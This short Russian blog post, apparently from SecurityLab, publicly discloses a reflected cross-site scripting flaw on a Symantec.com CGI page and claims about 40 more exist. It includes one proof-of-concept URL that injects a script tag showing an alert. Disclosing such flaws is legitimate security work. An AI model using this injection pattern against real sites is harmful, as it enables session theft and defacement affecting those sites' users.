XSS на Symantec.com #2

XSS на Symantec.com #2
Вот еще одна XSS уязвимсть на сайте Symantec. Есть около 40. Интересно, умеют ли в Симантеке читать логи :)


www.symantec.com/region/fr/cgi-bin/pitstop.cgi?http://www.symantecstore.com/dr/v2/ec_Main.Entry?SP=10007 "><script>alert('www.securitylab.ru')</script>&SID=27681&CID=207372
Security
Alt text

Ваш провайдер знает о вас больше, чем ваша девушка?

Присоединяйтесь и узнайте, как это остановить!

Валерий Марчук

Блог посвящен безопасности и жизни секлаба